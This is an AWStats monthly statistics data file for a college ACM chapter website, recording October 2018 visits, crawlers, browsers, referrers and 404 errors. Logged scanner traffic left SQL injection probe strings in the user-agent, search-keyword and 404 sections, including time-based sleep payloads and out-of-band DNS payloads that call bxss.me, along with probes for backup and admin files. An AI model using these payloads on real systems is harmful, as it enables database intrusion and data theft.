AWSTATS DATA FILE 7.6 (build 20161204)
# If you remove this file, all statistics for date 201810 will be lost/reset.
# Last config file used to build this data file was /home/pccoehos/tmp/awstats/awstats.pccoe.hosting.acm.org.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2018                
POS_TIME 2692                
POS_VISITOR 26692               
POS_DAY 39741               
POS_DOMAIN 3618                
POS_LOGIN 4353                
POS_ROBOT 4508                
POS_WORMS 5924                
POS_EMAILSENDER 6055                
POS_EMAILRECEIVER 6198                
POS_SESSION 40644               
POS_SIDER 40836               
POS_FILETYPES 6333                
POS_DOWNLOADS 6614                
POS_OS 6681                
POS_BROWSER 6996                
POS_SCREENSIZE 9172                
POS_UNKNOWNREFERER 9246                
POS_UNKNOWNREFERERBROWSER 10754               
POS_ORIGIN 12107               
POS_SEREFERRALS 12254               
POS_PAGEREFS 12612               
POS_SEARCHWORDS 13678               
POS_KEYWORDS 13936               
POS_MISC 2356                
POS_ERRORS 14103               
POS_CLUSTER 4209                
POS_SIDER_404 14222               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20181101004259 5 776 10751260332807
FirstTime 20181001011541
LastTime 20181031234148
LastUpdate 20181101233936 5 0 4 0 0
TotalVisits 310                 
TotalUnique 190                 
MonthHostsKnown 0                   
MonthHostsUnknown 375                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
DirectorSupport 0 0 0
QuickTimeSupport 0 0 0
FlashSupport 0 0 0
JavaEnabled 0 0 0
TotalMisc 0 0 0
AddToFavourites 0 0 0
WindowsMediaPlayerSupport 0 0 0
RealPlayerSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 23 1135 113070138 21 721 4590368
1 23 798 84498777 33 107 3223015
2 18 471 59027751 15 175 4570916
3 10 248 33769837 16 61 1041024
4 17 588 64564071 20 169 434613
5 14 297 34913946 92 202 2465619
6 33 307 37808134 69 488 19032031
7 18 553 70181122 24 493 1726461
8 93 1029 105166264 36 793 499814
9 46 425 48960065 19 458 136184
10 21 621 64444098 36 408 204304
11 21 211 27213861 22 424 1384716
12 14 320 29418176 22 184 639287
13 18 769 97875001 31 669 7536628
14 15 386 42394570 17 410 1193235
15 13 288 43030322 22 381 1008427
16 10 165 19231325 19 166 371466
17 235 379 20601094 1739 1900 5638768
18 1 2 61497 15 187 16366917
19 13 44 2099879 21 117 980005
20 42 290 32181628 24 288 17656283
21 8 62 2054476 23 158 1364467
22 298 675 48038987 16 302 4166144
23 20 397 32644252 22 313 1482632
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 34
us 383 1322 136676767
nl 201 201 196119
zz 188 188 914808
in 121 6598 757285201
cz 41 184 19370547
ip 21 898 98398924
fr 13 16 185577
cn 11 326 23126262
ru 9 13 488821
ca 6 118 10416692
kr 6 110 7799438
gb 5 6 272068
de 4 121 15213690
dm 2 2 9610
th 2 4 66745
jp 1 54 4664194
ro 1 1 35840
cl 1 1 2717
ng 1 1 4866
uz 1 41 2920121
sc 1 1 4866
kw 1 117 16783945
pt 1 1 4744
pe 1 2 13625
iq 1 122 16949704
eg 0 1 198632
pk 0 1 100119
jo 0 3 76971
ma 0 1 92870
au 0 1 87114
my 0 1 640406
sa 0 2 185740
mx 1 1 35840
es 0 1 25657
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 32
bingpreview 326 39747047 20181028064717 0
Googlebot\-Image/ 271 6133214 20181031174047 0
SeznamBot/ 262 722868 20181026065731 122
bingbot/ 226 15207481 20181031223612 50
Googlebot/ 216 1659280 20181031165932 25
bot[\s_+:,\.\;\/\\-] 152 383815 20181031122217 67
YandexBot/ 135 2345255 20181030195722 65
archive\.org_bot 117 16706603 20181030205151 1
Exabot/ 49 112697 20181028170638 17
unknown 46 1426 20181031082013 46
SemrushBot/ 42 69460 20181030085631 22
facebookexternalhit/ 30 2296397 20181026010706 0
MJ12bot/ 30 506687 20181031030043 15
YandexImages/ 28 5606754 20181029020226 0
crawl 24 123751 20181030084740 2
gocrawl 22 682 20181027062328 22
Sogou[\x20]web[\x20]spider/ 19 16793 20181031032248 14
Wget/ 16 103024 20181010154358 0
Apache\-HttpClient/ 15 72990 20181030104746 0
YandexMobileBot/ 13 456779 20181013152128 0
BLEXBot/ 8 20568 20181028231338 3
CCBot/ 5 10668 20181018040204 2
no_user_agent 5 241040 20181021142616 0
linkdexbot/ 4 14629 20181021074337 1
Applebot/ 4 9672 20181028014808 2
DuckDuckGo\-Favicons\-Bot/ 2 13625 20181013124048 0
MojeekBot/ 2 4775 20181012094144 1
ZumBot/ 2 35875 20181018133726 1
link 2 4775 20181007150127 1
Mail\.RU_Bot/ 1 35840 20181021211450 0
Gluten[\x20]Free[\x20]Crawler/ 1 4866 20181028113048 0
AhrefsBot/ 1 31 20181022114650 1
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 11
Unknown 302 45748 0 0
woff 1 90412 0 0
gif 4 41102 0 0
js 689 5132216 0 0
png 314 42980596 0 0
svg 2 353 0 0
css 717 3967284 0 0
html 708 3728917 0 0
jpeg 433 46684800 0 0
jpg 7277 1010346518 0 0
woff2 13 231263 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 1
/robots.txt 0 1 31
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 19
macosx 486 9
win8.1 124 4
macosx9 1 0
ios_iphone 542 7
ios_ipad 1 0
linuxandroid 4022 68
win10 2628 84
linux 582 22
j2me 1 0
macosx12 10 1
winxp 10 5
macosx6 2 2
Unknown 562 554
win8 117 1
win7 1340 258
unix 1 1
macosx11 14 6
winnt 1 1
winlong 17 1
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 104
chrome50.0.2661.102 12 12
chrome61.0.3163.128 250 4
chrome40.0.2214.89 5 0
edge13 3 0
chrome58.0.3029.81 1 0
chrome68.0.3440.85 2 0
chrome38.0.0.0 3 0
chrome70.0.3538.67 194 2
chrome30.0.1599.82 7 0
safari10.0.1 7 0
safari5.1.7 1 1
safari11.0 234 2
chrome33.0.0.0 1 0
netscape5.0 70 0
chrome62.0.3202.84 136 1
chrome46.0.2490.11 4 1
chrome62.0.3202.89 1 1
chrome43.0.2357.121 1 0
chrome70.0.3538.77 245 3
firefox11.0 4 0
chrome68.0.3440.91 253 6
chrome28.0.1500.94 1 0
firefox50.0 1 1
chrome34.0.1847.137 2 2
chrome63.0.3239.132 15 2
edge16 1 1
msie11.0 4 2
chrome45.0.2454.101 2 0
Unknown 556 554
chrome52.0.2743.116 3 3
chrome67.0.3396.79 52 1
chrome67.0.3396.103 1 0
chrome67.0.3396.99 1 1
chrome24.0.1312.56 41 1
firefox62.0.3 1 0
msie7.0 2 0
firefox58.0 1 1
edge17 121 1
chrome67.0.3396.87 275 5
safari12.0 483 8
android 6 1
edge15 2 0
chrome64.0.3282.123 117 1
chrome61.0.3163.100 2 2
firefox48.0 218 2
firefox40.1 3 3
cloudflare 6 0
opera12.16 1 0
edge12 122 1
msie9.0 17 3
firefox26.0 1 0
chrome58.0.3029.110 1 0
chrome69.0.3497.100 4315 77
firefox57.0 2 1
chrome21.0.1180.89 1 1
chrome70.0.3538.64 67 3
chrome34.0.1847.131 1 1
opera42.0.2393.94 4 4
chrome43.0.2357.134 1 1
chrome37.0.0.0 1 0
chrome69.0.3497.81 1 0
chrome69.0.3494.0 114 1
chrome49.0.2623.112 1 0
chrome17.0.963.56 1 1
chrome30.0.0.0 1 0
mozilla 1 0
chrome57.0.2987.108 29 2
firefox47.0 119 1
msie6.0 3 3
chrome65.0.3325.181 34 3
safari9.0 3 3
opera33.0.2254.125672 1 0
firefox63.0 1 0
opera8.50 1 1
firefox62.0 861 15
opera36.0.2130.32 8 8
chrome14.0.803.0 1 1
chrome68.0.3440.106 234 2
arora 1 1
chrome67.0.3396.81 130 2
opera11.00 1 1
chrome54.0.2840.87 2 0
firefox15.0 10 10
chrome49.0.2623.75 23 11
chrome55.0.2883.87 1 0
chrome64.0.3282.137 114 1
firefox64.0 117 1
chrome62.0.3202.94 8 8
chrome41.0.2228.0 350 207
firefox52.0 12 5
chrome38.0.1025.166 257 5
chrome66.0.3359.181 1 1
chrome56.0.2924.87 1 0
chrome66.0.3359.117 3 3
safari11.0.3 1 1
chrome66.0.3359.126 117 1
chrome60.0.3112.101 2 2
chrome51.0.2704.106 3 3
safari10.0 1 0
chrome55.0.2883.91 3 0
chrome41.0.2720.123 1 1
chrome69.0.3497.76 1 0
firefox45.0 1 1
chrome20.0.1132.57 1 1
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 32
1_waitfor_delay_'0:0:6'_-- 20181029171411
python-requests/2.18.4 20181011214052
-1_OR_2_398-398-1=0_0_0_1 20181029171407
WhatsApp/2.18.293_A 20181012232010
The_Knowledge_AI 20181031082013
xhz4vT3s';select_pg_sleep(6);_-- 20181029171412
rg-community-event 20181021142617
-1\ 20181029171409
-1'_OR_2_453-453-1=0_0_0_1_-- 20181029171408
91Y6Y1ib');select_pg_sleep(9);_-- 20181029171412
null 20181002032842
-1_OR_2_582-582-1=0_0_0_1_-- 20181029171407
\\ 20181029171349
Cpanel-HTTP-Client/1.0 20181031222144
-1'_OR_2_262-262-1=0_0_0_1_or_'9HTv9D4Z'=' 20181029171408
SEMrushBot 20181031093930
ia_archiver 20181004023739
(select(0)from(select(sleep(6)))v)/*'_(select(0)from(select(sleep(6)))v)_'\ 20181029171410
76' 20181029171414
8fV8Ig9L 20181029171407
1'\ 20181029171348
\xbf'\xbf\ 20181029171352
Mozilla/5.0_(compatible;_CloudFlare-AlwaysOnline/1.0;__http://www.cloudflare.com/always-online)_AppleWebKit/534.34 20181010031649
\xf0''\xf0\ 20181029171353
NKulykVb';_waitfor_delay_'0:0:6'_-- 20181029171411
Mozilla/5.0_(compatible;_bingbot/2.0;__http://www.bing.com/bingbot.htm) 20181026042112
@@0jb68 20181029171350
'||UTL_INADDR.get_host_address('dns.'||'sqli.051130.27639-21.27639.7cd75.1.bxss'||'.me')||' 20181029171413
KFQQQ9js'));select_pg_sleep(9);_-- 20181029171412
JyI= 20181029171351
1_\xc0\xa7\xc0\xa2%2527%2522 20181029171350
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'\ 20181029171410
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 31
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'\ 20181029171410
com.google.GoogleMobile/59.0.0_iPad/12.0_hw/iPad4_1 20181004064211
-1'_OR_2_262-262-1=0_0_0_1_or_'9HTv9D4Z'=' 20181029171408
Cpanel-HTTP-Client/1.0 20181031222144
1_\xc0\xa7\xc0\xa2%2527%2522 20181029171350
\\ 20181029171349
JyI= 20181029171351
'||UTL_INADDR.get_host_address('dns.'||'sqli.051130.27639-21.27639.7cd75.1.bxss'||'.me')||' 20181029171413
91Y6Y1ib');select_pg_sleep(9);_-- 20181029171412
null 20181002032842
-1_OR_2_582-582-1=0_0_0_1_-- 20181029171407
KFQQQ9js'));select_pg_sleep(9);_-- 20181029171412
@@0jb68 20181029171350
-1'_OR_2_453-453-1=0_0_0_1_-- 20181029171408
-1\ 20181029171409
xhz4vT3s';select_pg_sleep(6);_-- 20181029171412
\xf0''\xf0\ 20181029171353
NKulykVb';_waitfor_delay_'0:0:6'_-- 20181029171411
rg-community-event 20181021142617
The_Knowledge_AI 20181031082013
\xbf'\xbf\ 20181029171352
1'\ 20181029171348
WhatsApp/2.18.293_A 20181012232010
8fV8Ig9L 20181029171407
76' 20181029171414
-1_OR_2_398-398-1=0_0_0_1 20181029171407
python-requests/2.18.4 20181011214052
(select(0)from(select(sleep(6)))v)/*'_(select(0)from(select(sleep(6)))v)_'\ 20181029171410
SEMrushBot 20181031093930
1_waitfor_delay_'0:0:6'_-- 20181029171411
ia_archiver 20181004023739
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 696 915
From1 23 23
From2 235 309
From3 16 151
From4 54 9063
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 11
bing 0 8
www_google_co_th 1 1
www_google_com_eg 0 1
www_google_co_jp 0 1
www_google_com 205 233
www_google_ca 0 1
www_google_com_pk 0 1
images_google_com 0 1
www_google_co_in 28 60
www_google_com_au 0 1
baidu 1 1
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 20
http://india.acm.org 2 2
http://dl.acm.org/event.cfm 1 1
https://www.touchofclass.com/sorina-comforter-bed-set-beige/p/X073-001/ 1 1
http://www.unifiedcrest.com 1 1
https://www.acm.org/tosn/ 1 1
https://www.johnson.cornell.edu/Programs/Full-Time-MBA/One-Year-MBA/Careers 1 1
https://twitter.com/acmwmuses 1 1
https://www.acm.org/chapters/local-activities 1 1
https://dl.acm.org/ft_gateway.cfm 1 1
https://idw-online.de/de/institution1811 1 1
https://chifoo.org/speaker-series/ 1 1
https://www.mycakeschool.com/blog/lets-hoo-hoo-hula-a-blog-tutorial/' 1 1
http://eu4.paradoxwikis.com/index.php 1 1
https://chifoo.org/archive/ 1 1
http://india.acm.org/#chapters 1 1
http://webcache.googleusercontent.com/search 0 127
http://smart-wp.com/Services 0 1
http://smart-wp.com 0 3
http://hpssociety.info/news/digital-india-poster-presentation.html 0 1
http://www.hpssociety.info/news/digital-india-poster-competition.html 0 3
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 2
testing 188
testing+;copy+select+to+program+nslookup+dns.sqli.\\051130.27639-12.27639.7cd75.\\1.bxss.me 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 7
testing 189
;copy 1
nslookup 1
dns.sqli.\\051130.27639-12.27639.7cd75.\\1.bxss.me 1
to 1
program 1
select 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 3
301 7 4319
206 53 2736750
404 7419 2302888
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 274
/thinkpic/ 1 -
/images/18vineet-web@2x.jpg 50 http://pccoe.acm.org/
/anantya-2015/ 4 -
/distinguished-speaker-programme-on-multi-core-programming/ 1 -
/images/18Shruthi-Membership@2x.jpg 51 http://pccoe.acm.org/
/-1%20OR%203%2b658-658-1=0%2b0%2b0%2b1%20--%20.html 1 http://pccoe.hosting.acm.org/
/assets/images/cells/pdc.png 1 -
/eminent-speaker-programme-recent-trends-in-it/ 1 -
/images/18atharva-membership@2x.jpg 50 http://pccoe.acm.org/
/tnp-cell/ 1 -
/18-19Images/anantya3@2x.jpg 27 http://pccoe.acm.org/
/images/gallery/acs1@2x.jpg 51 http://pccoe.acm.org/
/images/gallery/a7@2x.jpg 24 http://pccoe.acm.org/
/images/mohit-art@2x.jpeg 50 http://pccoe.acm.org/
/images/gallery/a1@2x.jpg 25 http://pccoe.acm.org/
/Cells/CPDC.html 1 -
/images/gallery/m5@2x.jpg 51 http://pccoe.acm.org/
/images/sports@2x.jpg 51 http://pccoe.acm.org/
/joomla/robots.txt 8 -
/css_.php 5 http://pccoe.acm.org/css_.php
/images/18sai-web@2x.jpg 50 http://pccoe.acm.org/
/18-19Images/anantya6@2x.jpg 26 http://pccoe.acm.org/
/(select(0)from(select(sleep(9)))v)/*'%2b(select(0)from(select(sleep(9)))v)%2b'\"%2b(select(0)from(select(sleep(9)))v)%2b\"*/.html 1 http://pccoe.hosting.acm.org/
/18-19Images/anantya1@2x.JPG 2 http://pccoe.acm.org/
/images/dipesh@2x.jpg 11 http://pccoe.acm.org/pccoeacm.html
/pccoeacm.html/anantya.html 1 -
/images/speakers/ 209 http://www.google.com/search
/images/gallery/esp_3@2x.jpg 25 http://pccoe.acm.org/
/images/kedar@2x.jpg 51 http://pccoe.acm.org/
/images/18pranjali-coTreas@2x.jpg 50 http://pccoe.acm.org/
/images/gallery/acs3@2x.jpg 51 http://pccoe.acm.org/
/kriskowal/es5-shim/blob 1 http://pccoe.hosting.acm.org/js/modernizr.js
/images/gallery/t2@2x.jpg 54 http://pccoe.acm.org/
/images/gallery/i2@2x.jpg 25 http://pccoe.acm.org/
/18-19Images/sports2@2x.jpg 29 http://pccoe.acm.org/
/images/gallery/a5@2x.jpg 26 http://pccoe.acm.org/
/cms/ 1 -
/images/18ruchira-grievance@2x.jpg 50 http://pccoe.acm.org/
/18-19Images/anantya8@2x.jpg 26 http://pccoe.acm.org/
/images/higher@2x.jpg 51 http://pccoe.acm.org/
/images/leetcode@2x.jpg 50 http://pccoe.acm.org/
/android-workshop/ 1 -
/joomla/administrator/index.php 8 -
/images/abhishek@2x.jpg 11 http://pccoe.acm.org/pccoeacm.html
/images/grievance@2x.jpg 51 http://pccoe.acm.org/
/license.php 15 http://pccoe.acm.org/license.php
/kriskowal 1 http://pccoe.hosting.acm.org/js/modernizr.js
/wordpress/wp-login.php 1 -
/assets/images/gallery/1.jpg 1 -
/fonts/ 211 http://www.google.com/search
/digital-india-week/ 2 -
/images/vishal@2x.jpg 11 http://pccoe.acm.org/pccoeacm.html
/images/gallery/h2@2x.jpg 51 http://pccoe.acm.org/
/images/18pushpak-pdc@2x.jpeg 50 http://pccoe.acm.org/
/images/darshit@2x.jpg 51 http://pccoe.acm.org/
/18-19Images/anantya1@2x.jpg 27 http://pccoe.acm.org/
/images/18mohitnakhale-Secy@2x.jpg 50 http://pccoe.acm.org/
/images/gallery/h4@2x.jpg 51 http://pccoe.acm.org/
/images/codechef@2x.jpg 50 http://pccoe.acm.org/
/author/darshit12/ 3 -
/Q8ZB5TME 1 -
/images/shreya@2x.jpg 50 http://pccoe.acm.org/
/kriskowal/es5-shim 1 http://pccoe.hosting.acm.org/js/modernizr.js
/images/aishwarya@2x.jpg 11 http://pccoe.acm.org/pccoeacm.html
/images/gallery/a6@2x.jpg 25 http://pccoe.acm.org/
/images/imad@2x.jpg 50 http://pccoe.acm.org/
/images/reena@2x.jpg 11 http://pccoe.acm.org/pccoeacm.html
/author/parveen16/ 1 -
/18-19Images/team1@2x.jpg 28 http://pccoe.acm.org/
/assets/images/cells/isr.png 1 -
/acm.org.zip 4 -
/pccoeacm.html/urop.html 1 -
/18-19Images/esp3@2x.jpeg 2 http://pccoe.acm.org/
/18-19Images/anantya7@2x.jpg 51 http://pccoe.acm.org/
/2000 1 http://pccoe.hosting.acm.org/js/modernizr.js
/18-19Images/sports1@2x.jpg 29 http://pccoe.acm.org/
/assets/images/cells/grivances.png 1 -
/apple_station 1 -
/images/smart@2x.jpg 50 http://pccoe.acm.org/
/pccoeacm' 1 http://pccoe.hosting.acm.org/
/meet-the-team/ 6 -
/images/art@2x.jpg 51 http://pccoe.acm.org/
/2015/09/ 2 -
/images/gallery/i4@2x.jpg 26 http://pccoe.acm.org/
/wp-login.php 6 -
/css/ 209 http://www.google.com/search
/2000/svg 1 http://pccoe.hosting.acm.org/js/modernizr.js
/images/coursera@2x.jpg 50 http://pccoe.acm.org/
/'%7c%7cUTL_INADDR.get_host_address('dns.'%7c%7c'sqli.051130.27639-3.27639.fea6d.1.bxss'%7c%7c'.me')%7c%7c'.html 1 http://pccoe.hosting.acm.org/
/images/individual@2x.jpg 193 http://pccoe.acm.org/
/assets/images/members/Neha.jpeg 1 -
/images/gallery/m0@2x.jpg 51 http://pccoe.acm.org/
/images/gallery/m3@2x.jpg 52 http://pccoe.acm.org/
/pccoe.hosting.acm.org.sql 4 -
/images/gallery/a8@2x.jpg 24 http://pccoe.acm.org/
/Cells/ISR.html 1 -
/18-19Images/ 210 http://www.google.com/search
/images/gallery/t3@2x.jpg 54 http://pccoe.acm.org/
/images/anamika@2x.jpg 51 http://pccoe.acm.org/
/blog/administrator/index.php 8 -
/images/gallery/pcl2@2x.jpg 54 http://pccoe.acm.org/
/images/gallery/m2@2x.jpg 52 http://pccoe.acm.org/
/18-19Images/anantya6@2x.JPG 1 http://pccoe.acm.org/
/Cells/ART.html 1 -
/-1%20OR%202%2b658-658-1=0%2b0%2b0%2b1%20--%20.html 1 http://pccoe.hosting.acm.org/
/images/hash_bin@2x.jpg 50 http://pccoe.acm.org/
/%bf'%bf\".html 1 http://pccoe.hosting.acm.org/
/18-19Images/sports4@2x.jpeg 1 http://pccoe.acm.org/
/images/gallery/h3@2x.jpg 51 http://pccoe.acm.org/
/assets/images/gallery/5.jpg 1 -
/images/18som-treas@2x.jpg 50 http://pccoe.acm.org/
/assets/images/cells/art.png 1 -
/if(now()=sysdate()%2csleep(6)%2c0)/*'XOR(if(now()=sysdate()%2csleep(6)%2c0))OR'\"XOR(if(now()=sysdate()%2csleep(6)%2c0))OR\"*/.html 1 http://pccoe.hosting.acm.org/
/pranayam/ 2 -
/images/18oorja-cpdc@2x.jpg 50 http://pccoe.acm.org/
/assets/images/members/SonaliMam.jpg 1 -
/home/ 5 -
/backup.tar 4 -
/images/gopi@2x.jpg 11 http://pccoe.acm.org/pccoeacm.html
/%40%40cWilO.html 1 http://pccoe.hosting.acm.org/
/respond.php 1 -
/18-19Images/anantya2@2x.JPG 1 http://pccoe.acm.org/
/blog/ 10 -
/images/ankur@2x.jpg 11 http://pccoe.acm.org/pccoeacm.html
/images/rahul@2x.jpg 50 http://pccoe.acm.org/
/vp-admin 1 -
/18-19Images/anantya3@2x.JPG 1 http://pccoe.acm.org/
/farewell-2015/ 1 -
/js/ 211 http://www.google.com/search
/images/18AishwaryaYadav-Support@2x.jpg 51 http://pccoe.acm.org/
/assets/images/members/Vaigavi.jpg 1 -
/18-19Images/anantya7@2x.JPG 2 http://pccoe.acm.org/
/administrator/index.php 9 -
/HitCount.asp 1 -
/images/saransh@2x.jpg 51 http://pccoe.acm.org/
/2015/02/ 1 -
/images/18ketan-web@2x.jpg 50 http://pccoe.acm.org/
/induction-programme-2015/ 1 -
/18-19Images/esp2@2x.JPG 1 http://pccoe.acm.org/
/readers-club/ 2 -
/images/18amulya-art@2x.jpeg 51 http://pccoe.acm.org/
/images/udacity@2x.jpg 50 http://pccoe.acm.org/
/images/gallery/esp_2@2x.jpg 25 http://pccoe.acm.org/
/JyI=.html 1 http://pccoe.hosting.acm.org/
/images/pdc@2x.jpg 51 http://pccoe.acm.org/
/assets/images/gallery/7.jpg 1 -
/workshop-on-hackathon-android-and-cloud-computing/ 1 -
/2015/04/ 2 -
/images/cpdc@2x.jpg 51 http://pccoe.acm.org/
/923'.html 1 http://pccoe.hosting.acm.org/
/assets/images/cells/sports.png 1 -
/images/18Disha-Support@2x.jpg 51 http://pccoe.acm.org/
/SUItzeo1 1 -
/images/interviewbit@2x.jpg 50 http://pccoe.acm.org/
/images/nptel@2x.jpg 50 http://pccoe.acm.org/
/kriskowal/es5-shim/blob/master 1 http://pccoe.hosting.acm.org/js/modernizr.js
/images/18Soham-ISR@2x.jpg 50 http://pccoe.acm.org/
/images/gallery/acs2@2x.jpg 51 http://pccoe.acm.org/
/cpd-cell/ 3 -
/images/ankush@2x.jpg 51 http://pccoe.acm.org/
/images/su_doers@2x.jpg 50 http://pccoe.acm.org/
/assets/images/cells/higher.png 1 -
/%f0''%f0\"\".html 1 http://pccoe.hosting.acm.org/
/images/acmw@2x.jpg 50 http://pccoe.acm.org/
/images/18tejal-pdc@2x.jpeg 50 http://pccoe.acm.org/
/assets/images/gallery/2.jpg 1 -
/images/gallery/h1@2x.jpg 51 http://pccoe.acm.org/
/assets/images/cells/nss.png 1 -
/images/gallery/i1@2x.jpg 25 http://pccoe.acm.org/
/Cells/PDC.html 1 -
/18-19Images/anantya8@2x.jpeg 1 http://pccoe.acm.org/
/18-19Images/esp2@2x.jpg 28 http://pccoe.acm.org/
/demo/ 1 -
/images/gallery/t1@2x.jpg 54 http://pccoe.acm.org/
/Cells/NSS.html 1 -
/1'\".html 1 http://pccoe.hosting.acm.org/
/images/neha@2x.jpg 11 http://pccoe.acm.org/pccoeacm.html
/images/amrita@2x.jpg 11 http://pccoe.acm.org/pccoeacm.html
/images/gallery/ 211 http://www.google.com/search
/images/gallery/a3@2x.jpg 25 http://pccoe.acm.org/
/images/RahulPatil@2x.jpeg 50 http://pccoe.acm.org/
/assets/images/gallery/6.jpg 1 -
/images/gallery/a2@2x.jpg 25 http://pccoe.acm.org/
/images/acm@2x.jpg 50 http://pccoe.acm.org/
/wordpress/ 11 -
/images/gallery/pcl4@2x.jpg 54 http://pccoe.acm.org/
/wp/wp-login.php 1 -
/images/gallery/i3@2x.jpg 25 http://pccoe.acm.org/
/18-19Images/anantya4@2x.jpg 27 http://pccoe.acm.org/
/images/prachi@2x.jpg 51 http://pccoe.acm.org/
/assets/images/members/Simran.jpeg 1 -
/sarg/ 1 -
/images/gallery/t4@2x.jpg 54 http://pccoe.acm.org/
/images/gsoc@2x.jpg 50 http://pccoe.acm.org/
/flow.php 1 -
/18-19Images/anantya5@2x.jpg 28 http://pccoe.acm.org/
/pccoeacm'%20AND%202*3*8=6*8%20AND%20'euJQ'='euJQ.html 1 http://pccoe.hosting.acm.org/
/images/pra_b@2x.jpg 50 http://pccoe.acm.org/
/pccoeacm\"%20AND%202*3*8=6*8%20AND%20\"Ujll\"=\"Ujll.html 1 http://pccoe.hosting.acm.org/
/images/gallery/esp_1@2x.jpg 53 http://pccoe.acm.org/
/18-19Images/sports1.jpeg 1 http://pccoe.acm.org/
/news/html/ 1 -
/images/gallery/pcl3@2x.jpg 54 http://pccoe.acm.org/
/images/gallery/m1@2x.jpg 52 http://pccoe.acm.org/
/images/18hansel-cpdc@2x.jpg 50 http://pccoe.acm.org/
/pd-cell/ 1 -
/images/gallery/esp_4@2x.jpg 25 http://pccoe.acm.org/
/sitemap.xml 26 -
/18-19Images/anantya2@2x.jpg 27 http://pccoe.acm.org/
/18-19Images/sports3@2x.jpg 28 http://pccoe.acm.org/
/images/sanchita@2x.jpg 11 http://pccoe.acm.org/pccoeacm.html
/author/darshit12/page/2/ 3 -
/U18aTQ8k')) 1 http://pccoe.hosting.acm.org/
/blog/wp-login.php 1 -
/Pxy9Boo1' 1 http://pccoe.hosting.acm.org/
/1acuiF1Pyf9LKe.html 1 -
/anantya.html 1 -
/images/hackerrank@2x.jpg 50 http://pccoe.acm.org/
/xmlrpc.php 9 -
/1%20waitfor%20delay%20'0:0:9'%20--%20.html 1 http://pccoe.hosting.acm.org/
/images/18Sayali-HighStdy@2x.jpg 50 http://pccoe.acm.org/
/images/isr@2x.jpg 51 http://pccoe.acm.org/
/eminent-speaker-programme-theory-of-computation/ 2 -
/wp/ 9 -
/team.html 5 -
/images/gallery/m4@2x.jpg 52 http://pccoe.acm.org/
/29HB7zFe' 1 http://pccoe.hosting.acm.org/
/kriskowal/es5-shim/blob/master/es5-shim.js 1 http://pccoe.hosting.acm.org/js/modernizr.js
/images/18sidraut-coSecy@2x.png 50 http://pccoe.acm.org/
/images/gallery/c1@2x.jpg 51 http://pccoe.acm.org/
/images/gallery/acs4@2x.jpg 51 http://pccoe.acm.org/
/Cells/SPORTS.html 1 -
/blog/robots.txt 17 -
/18-19Images/esp1@2x.jpg 28 http://pccoe.acm.org/
/-1%20OR%203%2b143-143-1=0%2b0%2b0%2b1.html 1 http://pccoe.hosting.acm.org/
/kymwAtZu') 1 http://pccoe.hosting.acm.org/
/%5c.html 1 http://pccoe.hosting.acm.org/
/anantya/bepaper.html 5 -
/18-19Images/team2@2x.jpg 28 http://pccoe.acm.org/
/images/18Pratik_member@2x.jpg 50 http://pccoe.acm.org/
/18-19Images/esp3@2x.jpg 52 http://pccoe.acm.org/
/css/fonts 1 -
/2015/08/ 2 -
/images/shubham@2x.jpeg 61 http://pccoe.acm.org/
/assets/images/gallery/4.jpg 1 -
/images/ 210 http://www.google.com/search
/main/ 1 -
/FrNZZgzy 1 -
/assets/images/gallery/3.jpg 1 -
/sitemap.xml.gz 1 http://pccoe.hosting.acm.org/robots.txt
/images/jovian@2x.jpg 61 http://pccoe.acm.org/
